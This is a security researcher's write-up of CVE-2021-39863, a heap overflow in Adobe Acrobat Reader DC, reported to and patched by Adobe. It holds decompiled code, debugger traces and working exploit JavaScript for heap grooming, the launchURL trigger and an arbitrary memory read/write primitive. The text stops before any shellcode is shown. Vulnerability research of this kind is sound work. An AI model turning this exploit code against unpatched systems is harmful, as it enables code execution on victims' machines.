Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

By Sergi Martinez

In late June, we published a blog post containing analysis of exploitation of a heap-buffer overflow vulnerability in Adobe Reader, a vulnerability that we thought corresponded to CVE-2021-21017. The starting point for the research was a publicly posted proof-of-concept containing root-cause analysis. Soon after publishing the blog post, we learnt that the CVE was not authoritative and that the publicly posted proof-of-concept was an 0day, even if the 0day could not be reproduced in the patched version. We promptly pulled the blog post and began investigating.

Further research showed that the vulnerability continued to exist in the latest version and was exploitable with only a few changes to our exploit. We reported our findings to Adobe. Adobe assigned CVE-2021-39863 to this vulnerability and released an advisory and patched versions of their products on September 14th, 2021.

Since the exploits were very similar, this post largely overlaps with the blog post previously removed. It analyzes and exploits CVE-2021-39863, a heap buffer overflow in Adobe Acrobat Reader DC up to and including version 2021.005.20060.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL whose encoding differs from that of the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in copying twice the number of bytes of the source ANSI string (relative URL) into a properly sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-39863

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encodings of the two strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  wchar_t *v6; // ebx
  CHAR *v7; // eax
  CHAR v8; // dl
  __int64 v9; // rax
  wchar_t *v10; // ecx
  __int64 v11; // rax
  int v12; // eax
  int v13; // eax
  int v14; // eax

[Truncated]

  v77 = 0;
  v76 = 0;
  v5 = 1;
  *(_QWORD *)v78 = 0i64;
  *(_QWORD *)iMaxLength = 0i64;
  v6 = 0;
  v49 = 0;
  v62 = 0;
  v74 = 0;
  if ( !a5 )
    return 0;
  *a5 = 0;
  v7 = lpString;

[1]

  if ( lpString && *lpString && (v8 = lpString[1]) != 0 && *lpString == (CHAR)0xFE && v8 == (CHAR)0xFF )
  {

[2]

    v9 = sub_2581890C(lpString);
    v78[1] = v9;
    if ( (HIDWORD(v9) & (unsigned int)v9) == -1 )
    {
LABEL_9:
      *a5 = -2;
      return 0;
    }
    v7 = lpString;
  }
  else
  {

[3]

    v78[1] = v78[0];
  }
  v10 = Source;
  if ( !Source || !v7 || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_86;
  }

[4]

  if ( *(_BYTE *)Source != 0xFE )
    goto LABEL_25;
  if ( *((_BYTE *)Source + 1) == 0xFF )
  {
    v11 = sub_2581890C(Source);
    iMaxLength[1] = v11;
    if ( (HIDWORD(v11) & (unsigned int)v11) == -1 )
      goto LABEL_9;
    v10 = Source;
    v12 = iMaxLength[1];
  }
  else
  {
    v12 = iMaxLength[0];
  }

[5]

  if ( *(_BYTE *)v10 == 0xFE && *((_BYTE *)v10 + 1) == 0xFF )
  {
    v13 = v12 + 2;
  }
  else
  {
LABEL_25:
    v14 = sub_25802A44((LPCSTR)v10);
    v10 = v37;
    v13 = v14 + 1;
  }
  iMaxLength[1] = v13;

[6]

  v15 = (CHAR *)sub_25802CD5(v10, 1, v13);
  v77 = v15;
  if ( !v15 )
  {
    *a5 = -7;
    return 0;
  }

[7]

  sub_25802D98(v38, (wchar_t *)v15, Source, iMaxLength[1]);

[8]

  if ( *lpString == (CHAR)0xFE && lpString[1] == (CHAR)0xFF )
  {
    v17 = v78[1] + 2;
  }
  else
  {
    v18 = sub_25802A44(lpString);
    v16 = v39;
    v17 = v18 + 1;
  }
  v78[1] = v17;

[9]

  v19 = (CHAR *)sub_25802CD5(v16, 1, v17);
  v76 = v19;
  if ( !v19 )
  {
    *a5 = -7;
LABEL_86:
    v5 = 0;
    goto LABEL_87;
  }

[10]

  sub_25802D98(v40, (wchar_t *)v19, (wchar_t *)lpString, v78[1]);
  if ( !(unsigned __int16)sub_258033CD(v77, iMaxLength[1], a5) || !(unsigned __int16)sub_258033CD(v76, v78[1], a5) )
    goto LABEL_86;

[11]

  v20 = sub_25802400(v77, v42);
  if ( v20 || (v20 = sub_25802400(v76, v50)) != 0 )
  {
    *a5 = v20;
    goto LABEL_86;
  }
  if ( !*(_BYTE *)Source || (v21 = v42[0], v50[0] != 5) && v50[0] != v42[0] )
  {
    v35 = sub_25802FAC(v50);
    v23 = a4;
    v24 = v35 + 1;
    if ( v35 + 1 > *a4 )
      goto LABEL_44;
    *a4 = v35;
    v25 = v50;
    goto LABEL_82;
  }
  if ( *lpString )
  {
    v26 = v55;
    v63[1] = v42[1];
    v63[2] = v42[2];
    v27 = v51;
    v63[0] = v42[0];
    v73 = 0i64;
    if ( !v51 && !v53 && !v55 )
    {
      if ( (unsigned __int16)sub_25803155(v50) )
      {
        v28 = v44;
        v64 = v42[3];
        v65 = v42[4];
        v66 = v42[5];
        v67 = v42[6];
        v29 = v43;
        if ( v49 == 1 )
        {
          v29 = v43 + 2;
          v28 = v44 - 1;
          v43 += 2;
          --v44;
        }
        v69 = v28;
        v68 = v29;
        v70 = v45;
        if ( v58 )
        {
          if ( *v59 != 47 )
          {

[12]

            v6 = (wchar_t *)sub_25802CD5((wchar_t *)(v58 + 1), 1, v58 + 1 + v46);
            if ( !v6 )
            {
              v23 = a4;
              v24 = v58 + v46 + 1;
              goto LABEL_44;
            }
            if ( v46 )
            {

[13]

              sub_25802D98(v41, v6, v47, v46 + 1);
              if ( *((_BYTE *)v6 + v46 - 1) != 47 )
              {
                v31 = sub_25818D6E(v30, (char *)v6, 47);
                if ( v31 )
                  *(_BYTE *)(v31 + 1) = 0;
                else
                  *(_BYTE *)v6 = 0;
              }
            }
            if ( v58 )
            {

[14]

              v32 = sub_25802A44((LPCSTR)v6);
              sub_25818C6A((char *)v6, v59, v58 + 1 + v32);
            }
            sub_25802E0C(v6, 0);
            v71 = sub_25802A44((LPCSTR)v6);
            v72 = v6;
            goto LABEL_75;
          }
          v71 = v58;
          v72 = v59;
        }

[Truncated]

LABEL_87:
  if ( v77 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v77);
  if ( v76 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v76);
  if ( v6 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824098 + 12))(v6);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
63ee7d70 55              push    ebp
0:000> dd poi(esp+4) L84
093499c8  7468fffe 3a737074 6f672f2f 656c676f
093499d8  6d6f632e 4141412f 41414141 41414141
093499e8  41414141 41414141 41414141 41414141
093499f8  41414141 41414141 41414141 41414141

[Truncated]

09349b98  41414141 41414141 41414141 41414141
09349ba8  41414141 41414141 41414141 41414141
09349bb8  41414141 41414141 41414141 2f2f3a41
09349bc8  00000000 0009000a 00090009 00090009
0:000> da poi(esp+4) L84
093499c8  "..https://google.com/AAAAAAAAAAA"
093499e8  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a08  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a28  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a48  "AAAA"
0:000> dd poi(esp+8)
0b943ca8  61616262 61616161 61616161 61616161
0b943cb8  61616161 61616161 61616161 61616161
0b943cc8  61616161 61616161 61616161 61616161
0b943cd8  61616161 61616161 61616161 61616161
0b943ce8  61616161 61616161 61616161 61616161
0b943cf8  61616161 61616161 61616161 61616161
0b943d08  61616161 61616161 61616161 61616161
0b943d18  61616161 61616161 61616161 61616161
0:000> da poi(esp+8)
0b943ca8  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943cc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943ce8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943d08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b943da8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943dc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943de8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943e08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter, lpString (i.e. the relative URL), is a valid Unicode UTF-16BE encoded string. If it is valid, the length of that string is calculated at [2] and stored in v78[1]. If it is not a valid UTF-16BE encoded string, v78[1] is set to 0 at [3]. The function that calculates the Unicode string length, sub_2581890C(), performs additional checks to ensure that the string passed as a parameter is a valid UTF-16BE encoded string. The following listing shows the decompiled code of this function.

int __cdecl sub_2581890C(char *a1)
{
  char *v1; // eax
  char v2; // cl
  int v3; // esi
  char v4; // bl
  char *v5; // eax
  int result; // eax

  v1 = a1;
  if ( !a1 || *a1 != (char)0xFE || a1[1] != (char)0xFF )
    goto LABEL_12;
  v2 = 0;
  v3 = 0;
  do
  {
    v4 = *v1;
    v5 = v1 + 1;
    if ( !v5 )
      break;
    v2 = *v5;
    v1 = v5 + 1;
    if ( !v4 )
      goto LABEL_10;
    if ( !v2 )
      break;
    v3 += 2;
  }
  while ( v1 );
  if ( v4 )
    goto LABEL_12;
LABEL_10:
  if ( !v2 )
    result = v3;
  else
LABEL_12:
    result = -1;
  return result;
}

The code listed above returns the length of the UTF-16BE encoded string passed as a parameter. Additionally, it implicitly performs the following checks to ensure the string has a valid UTF-16BE encoding:

  • The string must terminate with a double null byte.
  • The words composing the string that are not the terminator must not contain a null byte.

If any of the checks above fail, the function returns -1.
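
The checks can be restated as a small JavaScript model. This is a sketch written from the decompiled listing, not Adobe's code: the name validatedWideLength is hypothetical, the input is a plain byte array, and running off the end of the array returns -1 where the native code would simply keep reading memory.

```javascript
// Hypothetical model of sub_2581890C: returns the byte length of a
// BOM-prefixed string (BOM included, terminator excluded), or -1.
function validatedWideLength(bytes) {
  if (!bytes || bytes[0] !== 0xFE || bytes[1] !== 0xFF) {
    return -1; // no 0xFEFF marker at the start
  }
  let length = 0;
  for (let i = 0; i + 1 < bytes.length; i += 2) {
    const first = bytes[i];
    const second = bytes[i + 1];
    if (first === 0) {
      // A zero first byte is only accepted as part of the 00 00 terminator.
      return second === 0 ? length : -1;
    }
    if (second === 0) {
      return -1; // non-terminator word containing a null byte
    }
    length += 2;
  }
  return -1; // model-only case: no terminator inside the array
}

const wellFormed = validatedWideLength([0xFE, 0xFF, 0x68, 0x74, 0x00, 0x00]);
const nullInWord = validatedWideLength([0xFE, 0xFF, 0x68, 0x00, 0x00, 0x00]);
const noMarker = validatedWideLength([0x62, 0x62, 0x00, 0x00]);
console.log(wellFormed, nullInWord, noMarker);
```

As in the listing, the two marker bytes are counted in the returned length because the loop starts at the beginning of the string.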

Continuing with the first function mentioned in this section, at [4] the same checks already described are applied to the first parameter, Source (i.e. the base URL). At [5] the length of the Source variable is calculated taking into account its encoding. The function sub_25802A44() is an implementation of the strlen() function that works for both Unicode and ANSI encoded strings. At [6] an allocation of the size of the Source variable is performed by calling the function sub_25802CD5(), which is an implementation of the known calloc() function. Then, at [7], the contents of the Source variable are copied into this new allocation using the function sub_25802D98(), which is an implementation of the strncpy() function that works for both Unicode and ANSI encoded strings. These operations performed on the Source variable are equally performed on the lpString variable (i.e. the relative URL) at [8], [9], and [10].

The function at [11], sub_25802400(), receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [12] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [11]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Afterwards, at [13] the base URL is copied into the memory allocated to host the concatenation and at [14] its length is calculated and provided as a parameter to the call to sub_25818C6A. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [14] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818C6A(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[15]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[16]

    sub_258189D6(Destination, Source);
    result = 1;
  }
  else
  {

[17]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [15] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less than or equal to the desired concatenation length minus one. If the check passes, the function sub_258189D6 is called at [16]. Otherwise the strncat function at [17] is called.

The function sub_258189D6 called at [16] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_258189D6(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[18]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[19]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[20]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [18] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [19]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called at [20].

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.
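
The behaviour of the loop at [19] can be reproduced in a toy model. The following sketch runs the same copy logic over a single flat byte array that stands in for process memory. The function name appendTwoBytesAtATime, the offsets, the sizes and the neighbouring bytes are all invented for illustration; only the loop structure is taken from the listing.

```javascript
// Toy model of the Unicode branch at [19]. `heap` is one flat byte array that
// stands in for process memory; all offsets and sizes below are made up.
function appendTwoBytesAtATime(heap, destOffset, destLength, srcOffset) {
  let read = srcOffset + 2;            // the loop starts at lpString2 + 2
  let write = destOffset + destLength; // append position in the destination
  let first, second;
  do {
    first = heap[read];
    second = heap[read + 1];
    heap[write] = first;
    heap[write + 1] = second;
    read += 2;
    write += 2;
  } while (first !== 0 || second !== 0); // stops only on an aligned zero pair
  return { readEnd: read, writeEnd: write };
}

const heap = new Uint8Array(64);
const SRC = 0, SRC_SIZE = 6;     // ANSI "bbaaa" plus its single NUL
const DEST = 32, DEST_SIZE = 10; // 4 bytes already used + room for the source
heap.set([0x62, 0x62, 0x61, 0x61, 0x61, 0x00], SRC);
heap.set([0x41, 0x42, 0x43, 0x44], SRC + SRC_SIZE); // neighbouring chunk data
heap.set([0xFE, 0xFF, 0x68, 0x2F], DEST);           // BOM-prefixed destination

const result = appendTwoBytesAtATime(heap, DEST, 4, SRC);
const bytesReadPastSource = result.readEnd - (SRC + SRC_SIZE);
const bytesWrittenPastDest = result.writeEnd - (DEST + DEST_SIZE);
console.log({ bytesReadPastSource, bytesWrittenPastDest });
```

In this toy layout the single NUL of the ANSI string lands in the second byte of a pair, so the loop does not treat it as a terminator and carries on into the neighbouring bytes, which then end up past the end of the destination.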

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2021.005.20048 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)

Of these, the exploit does not bypass the following protection mechanism:

  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes in the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This reveals the absolute address of the corrupted ArrayBuffer and makes it possible to build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed to by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created at [1]. Then at [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the Code Analysis section of this post.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.
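
The length expression in the call above can be checked against the sizes seen earlier in this post. The following arithmetic sketch assumes that the ANSI allocation is the string length plus one terminator byte, that a busy chunk header is 8 bytes, and that the 0x200 term is the length of the base URL part (inferred from the 0x2600 request in the debugger output, not stated by the listing). The constant names are hypothetical.

```javascript
// Arithmetic check only; constant names are illustrative.
const CHUNK_HEADER = 0x8;   // busy heap chunk metadata
const BASE_URL_PART = 0x200; // assumption: inferred from 0x2600 - 0x2400

const relativeUrl = 'bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 - 0x8);

// Allocation for the relative URL copy: ANSI length plus a NUL byte.
const relativeAlloc = relativeUrl.length + 1;
const relativeChunk = relativeAlloc + CHUNK_HEADER;

// Allocation that holds the concatenation of both URLs.
const concatAlloc = relativeAlloc + BASE_URL_PART;
const concatChunk = concatAlloc + CHUNK_HEADER;

console.log(
  relativeAlloc.toString(16),
  relativeChunk.toString(16),
  concatAlloc.toString(16),
  concatChunk.toString(16)
);
```

Under these assumptions the two chunk sizes come out as 0x2408 and 0x2608, the same sizes used for the strings and ArrayBuffers when preparing the heap layout.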

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, the byteLength property of one ArrayBuffer is corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows reading and writing the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses, the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks is known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}
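
The offset adjustment in both helpers is plain 32-bit wraparound arithmetic. The sketch below isolates it; the function name toRelativeOffset and both addresses are hypothetical, and no memory is touched.

```javascript
// Arithmetic-only sketch: turn an absolute 32-bit address into the offset
// that a view starting at originAddress would need in order to reach it.
function toRelativeOffset(absoluteAddress, originAddress) {
  let offset = absoluteAddress - originAddress;
  if (offset < 0) {
    offset += 0x100000000; // wrap around the 32-bit address space
  }
  return offset;
}

const origin = 0x0b940000; // hypothetical origin of the relative primitive
const below = toRelativeOffset(0x01000000, origin); // target below the origin
const above = toRelativeOffset(0x0b940010, origin); // target above the origin

console.log(below.toString(16), above.toString(16));
```

A target below the origin yields a large positive offset that, added to the origin modulo 2^32, lands back on the target.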

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.
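
As a reminder of how these two objects interact in a standard JavaScript engine, the following minimal sketch writes and reads a little-endian value through a DataView and shows that accesses are checked against the buffer's byteLength. The variable names are illustrative.

```javascript
const buffer = new ArrayBuffer(16);
const view = new DataView(buffer);

// Write a 32-bit value in little-endian order and read it back.
view.setUint32(0, 0xdeadbabe, true);
const firstBytes = Array.from(new Uint8Array(buffer, 0, 4));
const roundTrip = view.getUint32(0, true);

// Accesses are bounds-checked against byteLength: reading 4 bytes at
// offset 14 of a 16-byte buffer is rejected with a RangeError.
let rejected = false;
try {
  view.getUint32(14, true);
} catch (err) {
  rejected = err instanceof RangeError;
}

console.log(firstBytes, roundTrip.toString(16), rejected);
```

This bounds check is the reason the byteLength field is the target of the corruption described earlier.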

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

